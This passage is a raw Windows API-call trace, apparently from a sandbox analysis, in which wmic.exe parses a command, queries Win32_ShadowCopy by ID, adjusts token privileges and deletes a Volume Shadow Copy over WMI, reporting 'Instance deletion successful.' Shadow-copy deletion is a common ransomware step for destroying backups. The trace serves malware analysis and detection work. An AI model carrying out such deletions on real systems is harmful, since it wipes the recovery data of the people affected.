(_Block=0x26cbc0) [0100.427] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0100.427] lstrlenW (lpString="PATH") returned 4 [0100.427] lstrlenW (lpString="where") returned 5 [0100.427] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0100.427] lstrlenW (lpString="WHERE") returned 5 [0100.427] lstrlenW (lpString="where") returned 5 [0100.427] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0100.427] lstrlenW (lpString="/") returned 1 [0100.428] lstrlenW (lpString="ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'") returned 43 [0100.428] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'", cchCount1=43, lpString2="/", cchCount2=1) returned 3 [0100.428] lstrlenW (lpString="-") returned 1 [0100.428] lstrlenW (lpString="ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'") returned 43 [0100.428] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'", cchCount1=43, lpString2="-", cchCount2=1) returned 3 [0100.428] lstrlenW (lpString="ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'") returned 43 [0100.428] malloc (_Size=0x58) returned 0x26d020 [0100.428] lstrlenW (lpString="ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'") returned 43 [0100.428] lstrlenW (lpString="/") returned 1 [0100.428] lstrlenW (lpString="delete") returned 6 [0100.428] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0100.428] lstrlenW (lpString="-") returned 1 [0100.428] lstrlenW (lpString="delete") returned 6 [0100.428] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0100.428] lstrlenW (lpString="delete") returned 6 [0100.428] malloc (_Size=0xe) returned 0x26cbc0 [0100.428] lstrlenW (lpString="delete") returned 6 [0100.428] lstrlenW (lpString="GET") returned 3 [0100.428] lstrlenW (lpString="delete") returned 6 [0100.428] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0100.428] lstrlenW (lpString="LIST") returned 4 [0100.428] lstrlenW (lpString="delete") returned 6 [0100.428] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0100.428] lstrlenW (lpString="SET") returned 3 [0100.428] lstrlenW (lpString="delete") returned 6 [0100.428] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0100.428] lstrlenW (lpString="CREATE") returned 6 [0100.428] lstrlenW (lpString="delete") returned 6 [0100.428] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0100.428] lstrlenW (lpString="CALL") returned 4 [0100.428] lstrlenW (lpString="delete") returned 6 [0100.428] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0100.428] lstrlenW (lpString="ASSOC") returned 5 [0100.428] lstrlenW (lpString="delete") returned 6 [0100.428] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0100.429] lstrlenW (lpString="DELETE") returned 6 [0100.429] lstrlenW (lpString="delete") returned 6 [0100.429] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0100.429] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0100.429] malloc (_Size=0x3e) returned 0x26d080 [0100.429] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0100.429] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0100.429] malloc (_Size=0x18) returned 0x26cc00 [0100.429] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*" [0100.429] lstrlenW (lpString="FROM") returned 4 [0100.429] lstrlenW (lpString="*") returned 1 [0100.429] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0100.429] malloc (_Size=0x18) returned 0x26cb80 [0100.429] free (_Block=0x26cc00) [0100.429] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3b00760009 | out: _String=0x0, _Context=0x3b00760009) returned="from" [0100.429] lstrlenW (lpString="FROM") returned 4 [0100.429] lstrlenW (lpString="from") returned 4 [0100.429] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0100.429] malloc (_Size=0x18) returned 0x26cc00 [0100.429] free (_Block=0x26cb80) [0100.429] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3c00760009 | out: _String=0x0, _Context=0x3c00760009) returned="Win32_ShadowCopy" [0100.429] malloc (_Size=0x18) returned 0x26cb80 [0100.429] free (_Block=0x26cc00) [0100.429] free (_Block=0x26d080) [0100.429] free (_Block=0x26cb80) [0100.429] lstrlenW (lpString="SET") returned 3 [0100.430] lstrlenW (lpString="delete") returned 6 [0100.430] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0100.430] lstrlenW (lpString="CREATE") returned 6 [0100.430] lstrlenW (lpString="delete") returned 6 [0100.430] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0100.430] free (_Block=0x26cef0) [0100.430] malloc (_Size=0x8) returned 0x266f20 [0100.430] lstrlenW (lpString="GET") returned 3 [0100.430] lstrlenW (lpString="delete") returned 6 [0100.430] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0100.430] lstrlenW (lpString="LIST") returned 4 [0100.430] lstrlenW (lpString="delete") returned 6 [0100.430] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0100.430] lstrlenW (lpString="ASSOC") returned 5 [0100.430] lstrlenW (lpString="delete") returned 6 [0100.430] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0100.430] WbemLocator:IUnknown:AddRef (This=0x1da1390) returned 0x3 [0100.430] free (_Block=0x3adfb0) [0100.430] lstrlenW (lpString="") returned 0 [0100.430] lstrlenW (lpString="XDUWTFONO") returned 9 [0100.430] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0100.430] lstrlenW (lpString="XDUWTFONO") returned 9 [0100.430] malloc (_Size=0x14) returned 0x26cb80 [0100.430] lstrlenW (lpString="XDUWTFONO") returned 9 [0100.430] GetCurrentThreadId () returned 0xa70 [0100.430] GetCurrentProcess () returned 0xffffffffffffffff [0100.430] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x1cf560 | out: TokenHandle=0x1cf560*=0x27c) returned 1 [0100.430] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1cf558 | out: TokenInformation=0x0, ReturnLength=0x1cf558) returned 0 [0100.430] malloc (_Size=0x118) returned 0x26d080 [0100.430] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x26d080, TokenInformationLength=0x118, ReturnLength=0x1cf558 | out: TokenInformation=0x26d080, ReturnLength=0x1cf558) returned 1 [0100.431] AdjustTokenPrivileges (in: TokenHandle=0x27c, DisableAllPrivileges=0, NewState=0x26d080*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=-1348993900, Attributes=0x336), (Luid.LowPart=0x0, Luid.HighPart=2543344, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0100.431] free (_Block=0x26d080) [0100.431] CloseHandle (hObject=0x27c) returned 1 [0100.431] lstrlenW (lpString="GET") returned 3 [0100.431] lstrlenW (lpString="delete") returned 6 [0100.431] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0100.431] lstrlenW (lpString="LIST") returned 4 [0100.431] lstrlenW (lpString="delete") returned 6 [0100.431] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0100.431] lstrlenW (lpString="SET") returned 3 [0100.431] lstrlenW (lpString="delete") returned 6 [0100.431] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0100.431] lstrlenW (lpString="CALL") returned 4 [0100.431] lstrlenW (lpString="delete") returned 6 [0100.431] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0100.431] lstrlenW (lpString="ASSOC") returned 5 [0100.431] lstrlenW (lpString="delete") returned 6 [0100.431] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0100.431] lstrlenW (lpString="CREATE") returned 6 [0100.431] lstrlenW (lpString="delete") returned 6 [0100.431] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0100.431] lstrlenW (lpString="DELETE") returned 6 [0100.431] lstrlenW (lpString="delete") returned 6 [0100.431] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0100.431] malloc (_Size=0x18) returned 0x26cc00 [0100.431] lstrlenA (lpString="") returned 0 [0100.431] malloc (_Size=0x2) returned 0x3adfb0 [0100.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff1c314c, cbMultiByte=-1, lpWideCharStr=0x3adfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0100.432] free (_Block=0x3adfb0) [0100.432] malloc (_Size=0x18) returned 0x26cca0 [0100.432] lstrlenA (lpString="") returned 0 [0100.432] malloc (_Size=0x2) returned 0x3adfb0 [0100.432] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff1c314c, cbMultiByte=-1, lpWideCharStr=0x3adfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0100.432] free (_Block=0x3adfb0) [0100.432] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0100.432] malloc (_Size=0x3e) returned 0x26d080 [0100.432] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0100.432] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0100.432] malloc (_Size=0x18) returned 0x26cba0 [0100.432] free (_Block=0x26cca0) [0100.432] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3f006e0007 | out: _String=0x0, _Context=0x3f006e0007) returned="*" [0100.432] lstrlenW (lpString="FROM") returned 4 [0100.432] lstrlenW (lpString="*") returned 1 [0100.432] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0100.432] malloc (_Size=0x18) returned 0x26cca0 [0100.432] free (_Block=0x26cba0) [0100.432] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x40006e0007 | out: _String=0x0, _Context=0x40006e0007) returned="from" [0100.432] lstrlenW (lpString="FROM") returned 4 [0100.432] lstrlenW (lpString="from") returned 4 [0100.432] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0100.432] malloc (_Size=0x18) returned 0x26cba0 [0100.432] free (_Block=0x26cca0) [0100.432] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x41006e0007 | out: _String=0x0, _Context=0x41006e0007) returned="Win32_ShadowCopy" [0100.432] malloc (_Size=0x18) returned 0x26cca0 [0100.433] free (_Block=0x26cba0) [0100.433] free (_Block=0x26d080) [0100.433] malloc (_Size=0x18) returned 0x26cba0 [0100.433] malloc (_Size=0x18) returned 0x26cc20 [0100.433] malloc (_Size=0x18) returned 0x26cc40 [0100.433] malloc (_Size=0x18) returned 0x26cc60 [0100.433] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0100.433] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0100.433] malloc (_Size=0x18) returned 0x26cc80 [0100.433] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0100.433] SysStringLen (param_1=" WHERE ") returned 0x7 [0100.433] malloc (_Size=0x18) returned 0x26ccc0 [0100.433] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ") returned 0x25 [0100.433] SysStringLen (param_1="ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'") returned 0x2b [0100.433] free (_Block=0x26cc00) [0100.433] free (_Block=0x26cc80) [0100.433] free (_Block=0x26cc60) [0100.433] free (_Block=0x26cc40) [0100.433] free (_Block=0x26cc20) [0100.433] free (_Block=0x26cba0) [0100.433] ??0CHString@@QEAA@XZ () returned 0x1cf4d0 [0100.433] GetCurrentThreadId () returned 0xa70 [0100.434] malloc (_Size=0x18) returned 0x26cba0 [0100.434] malloc (_Size=0x18) returned 0x26cc20 [0100.434] malloc (_Size=0x18) returned 0x26cc40 [0100.434] malloc (_Size=0x18) returned 0x26cc60 [0100.434] malloc (_Size=0x18) returned 0x26cc80 [0100.434] SysStringLen (param_1="\\\\") returned 0x2 [0100.434] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0100.434] malloc (_Size=0x18) returned 0x26cc00 [0100.434] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0100.434] SysStringLen (param_1="\\") returned 0x1 [0100.434] malloc (_Size=0x18) returned 0x26cce0 [0100.434] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0100.434] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0100.434] free (_Block=0x26cc00) [0100.434] free (_Block=0x26cc80) [0100.434] free (_Block=0x26cc60) [0100.434] free (_Block=0x26cc40) [0100.434] free (_Block=0x26cc20) [0100.434] free (_Block=0x26cba0) [0100.434] malloc (_Size=0x18) returned 0x26cba0 [0100.435] malloc (_Size=0x18) returned 0x26cc20 [0100.435] malloc (_Size=0x18) returned 0x26cc40 [0100.435] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1da1390, strNetworkResource="\\\\XDUWTFONO\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff2329d0 | out: ppNamespace=0xff2329d0*=0x1db3c18) returned 0x0 [0100.439] free (_Block=0x26cc40) [0100.439] free (_Block=0x26cc20) [0100.439] free (_Block=0x26cba0) [0100.439] CoSetProxyBlanket (pProxy=0x1db3c18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0100.439] free (_Block=0x26cce0) [0100.439] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0100.439] ??0CHString@@QEAA@XZ () returned 0x1cf420 [0100.439] GetCurrentThreadId () returned 0xa70 [0100.439] malloc (_Size=0x18) returned 0x26cce0 [0100.439] lstrlenA (lpString="") returned 0 [0100.439] malloc (_Size=0x2) returned 0x3adfb0 [0100.439] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff1c314c, cbMultiByte=-1, lpWideCharStr=0x3adfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0100.439] free (_Block=0x3adfb0) [0100.439] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'") returned 0x50 [0100.439] SysStringLen (param_1="") returned 0x0 [0100.440] free (_Block=0x26cce0) [0100.440] malloc (_Size=0x18) returned 0x26cce0 [0100.440] IWbemServices:ExecQuery (in: This=0x1db3c18, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy WHERE ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'", lFlags=0, pCtx=0x0, ppEnum=0x1cf428 | out: ppEnum=0x1cf428*=0x1db3d18) returned 0x0 [0100.491] free (_Block=0x26cce0) [0100.491] CoSetProxyBlanket (pProxy=0x1db3d18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0100.493] IEnumWbemClassObject:Next (in: This=0x1db3d18, lTimeout=-1, uCount=0x1, apObjects=0x1cf430, puReturned=0x1cf440 | out: apObjects=0x1cf430*=0x1db3d80, puReturned=0x1cf440*=0x1) returned 0x0 [0100.494] malloc (_Size=0x18) returned 0x26cce0 [0100.494] IWbemClassObject:Get (in: This=0x1db3d80, wszName="__PATH", lFlags=0, pVal=0x1cf450*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf450*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0100.494] free (_Block=0x26cce0) [0100.494] malloc (_Size=0x800) returned 0x26d080 [0100.494] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x26d080, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0100.494] FormatMessageW (in: dwFlags=0x2500, lpSource=0x26d080, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x1cf378, nSize=0x0, Arguments=0x1cf388 | out: lpBuffer="뚐2") returned 0x67 [0100.495] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0100.495] malloc (_Size=0x68) returned 0x26d890 [0100.495] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x26d890, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0100.495] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff232ab0 [0100.495] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0100.495] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0100.495] free (_Block=0x26d890) [0100.495] free (_Block=0x26d080) [0100.495] LocalFree (hMem=0x32b690) returned 0x0 [0100.495] IWbemServices:DeleteInstance (in: This=0x1db3c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0101.486] IUnknown:Release (This=0x1db3d80) returned 0x0 [0101.486] malloc (_Size=0x800) returned 0x26d080 [0101.486] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x26d080, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0101.486] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0101.486] malloc (_Size=0x20) returned 0x26cef0 [0101.486] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x26cef0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0101.486] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff232ab0 [0101.486] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0101.487] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0101.487] free (_Block=0x26cef0) [0101.487] free (_Block=0x26d080) [0101.487] IEnumWbemClassObject:Next (in: This=0x1db3d18, lTimeout=-1, uCount=0x1, apObjects=0x1cf430, puReturned=0x1cf440 | out: apObjects=0x1cf430*=0x0, puReturned=0x1cf440*=0x0) returned 0x1 [0101.488] IUnknown:Release (This=0x1db3d18) returned 0x0 [0101.489] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0101.489] free (_Block=0x26cca0) [0101.489] free (_Block=0x26ccc0) [0101.489] GetCurrentThreadId () returned 0xa70 [0101.489] ??0CHString@@QEAA@PEBG@Z () returned 0x1cf608 [0101.489] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x1cf608 [0101.489] lstrlenW (lpString="LIST") returned 4 [0101.489] lstrlenW (lpString="delete") returned 6 [0101.489] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0101.489] lstrlenW (lpString="ASSOC") returned 5 [0101.489] lstrlenW (lpString="delete") returned 6 [0101.489] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0101.489] lstrlenW (lpString="GET") returned 3 [0101.489] lstrlenW (lpString="delete") returned 6 [0101.489] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0101.490] ??1CHString@@QEAA@XZ () returned 0x4e97fe01 [0101.490] WbemLocator:IUnknown:Release (This=0x1db3c18) returned 0x0 [0101.490] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0101.490] _kbhit () returned 0x0 [0101.490] free (_Block=0x266f20) [0101.490] free (_Block=0x26cac0) [0101.490] free (_Block=0x26caa0) [0101.490] free (_Block=0x26ca80) [0101.491] free (_Block=0x26ca60) [0101.491] free (_Block=0x2670a0) [0101.491] free (_Block=0x26cb40) [0101.491] free (_Block=0x2685c0) [0101.491] free (_Block=0x26d020) [0101.491] free (_Block=0x26cbc0) [0101.491] free (_Block=0x26cfa0) [0101.491] free (_Block=0x26cae0) [0101.491] free (_Block=0x26cbe0) [0101.491] free (_Block=0x267140) [0101.491] free (_Block=0x266e00) [0101.491] free (_Block=0x26cff0) [0101.491] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0101.491] free (_Block=0x26ce20) [0101.491] free (_Block=0x26cb00) [0101.491] free (_Block=0x26cb20) [0101.491] free (_Block=0x26cf30) [0101.491] free (_Block=0x26cb60) [0101.491] free (_Block=0x267ee0) [0101.491] free (_Block=0x267f30) [0101.491] free (_Block=0x267f80) [0101.491] free (_Block=0x26cb80) [0101.491] free (_Block=0x266a20) [0101.491] free (_Block=0x266de0) [0101.491] free (_Block=0x268040) [0101.491] free (_Block=0x266dc0) [0101.491] free (_Block=0x268000) [0101.491] free (_Block=0x266d60) [0101.491] free (_Block=0x266d80) [0101.491] free (_Block=0x266c40) [0101.491] free (_Block=0x266c60) [0101.491] free (_Block=0x266be0) [0101.491] free (_Block=0x266c00) [0101.492] free (_Block=0x266ca0) [0101.492] free (_Block=0x266cc0) [0101.492] free (_Block=0x266d00) [0101.492] free (_Block=0x266d20) [0101.492] free (_Block=0x266b20) [0101.492] free (_Block=0x266b40) [0101.492] free (_Block=0x266ac0) [0101.492] free (_Block=0x266ae0) [0101.492] free (_Block=0x266b80) [0101.492] free (_Block=0x266ba0) [0101.492] free (_Block=0x266a60) [0101.492] free (_Block=0x266a80) [0101.492] free (_Block=0x2669d0) [0101.492] free (_Block=0x2669a0) [0101.492] free (_Block=0x266e90) [0101.492] WbemLocator:IUnknown:Release (This=0x1da1390) returned 0x2 [0101.492] WbemLocator:IUnknown:Release (This=0x1db3b28) returned 0x0 [0101.492] WbemLocator:IUnknown:Release (This=0x1db3a98) returned 0x0 [0101.493] WbemLocator:IUnknown:Release (This=0x1da1390) returned 0x1 [0101.493] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0101.493] WbemLocator:IUnknown:Release (This=0x1da1390) returned 0x0 [0101.493] free (_Block=0x26c9e0) [0101.493] free (_Block=0x26ca00) [0101.493] free (_Block=0x268540) [0101.493] free (_Block=0x26ca20) [0101.493] free (_Block=0x26ca40) [0101.493] free (_Block=0x268580) [0101.493] free (_Block=0x26c860) [0101.493] free (_Block=0x26c880) [0101.493] free (_Block=0x2683c0) [0101.493] free (_Block=0x26c8a0) [0101.493] free (_Block=0x26c8c0) [0101.493] free (_Block=0x268400) [0101.493] free (_Block=0x26c7e0) [0101.493] free (_Block=0x26c800) [0101.493] free (_Block=0x268340) [0101.493] free (_Block=0x26c820) [0101.493] free (_Block=0x26c840) [0101.493] free (_Block=0x268380) [0101.498] free (_Block=0x26c960) [0101.498] free (_Block=0x26c980) [0101.498] free (_Block=0x2684c0) [0101.498] free (_Block=0x26c9a0) [0101.498] free (_Block=0x26c9c0) [0101.498] free (_Block=0x268500) [0101.498] free (_Block=0x26c760) [0101.498] free (_Block=0x26c780) [0101.498] free (_Block=0x2682c0) [0101.498] free (_Block=0x26c7a0) [0101.498] free (_Block=0x26c7c0) [0101.499] free (_Block=0x268300) [0101.499] free (_Block=0x26c8e0) [0101.499] free (_Block=0x26c900) [0101.499] free (_Block=0x268440) [0101.499] free (_Block=0x26c920) [0101.499] free (_Block=0x26c940) [0101.499] free (_Block=0x268480) [0101.499] free (_Block=0x26c6a0) [0101.499] free (_Block=0x26c6c0) [0101.499] free (_Block=0x268200) [0101.499] free (_Block=0x26c560) [0101.499] free (_Block=0x26c580) [0101.499] free (_Block=0x2680c0) [0101.499] free (_Block=0x266e50) [0101.499] free (_Block=0x266e70) [0101.499] free (_Block=0x268080) [0101.499] free (_Block=0x26c5e0) [0101.499] free (_Block=0x26c600) [0101.499] free (_Block=0x268140) [0101.499] free (_Block=0x26c6e0) [0101.499] free 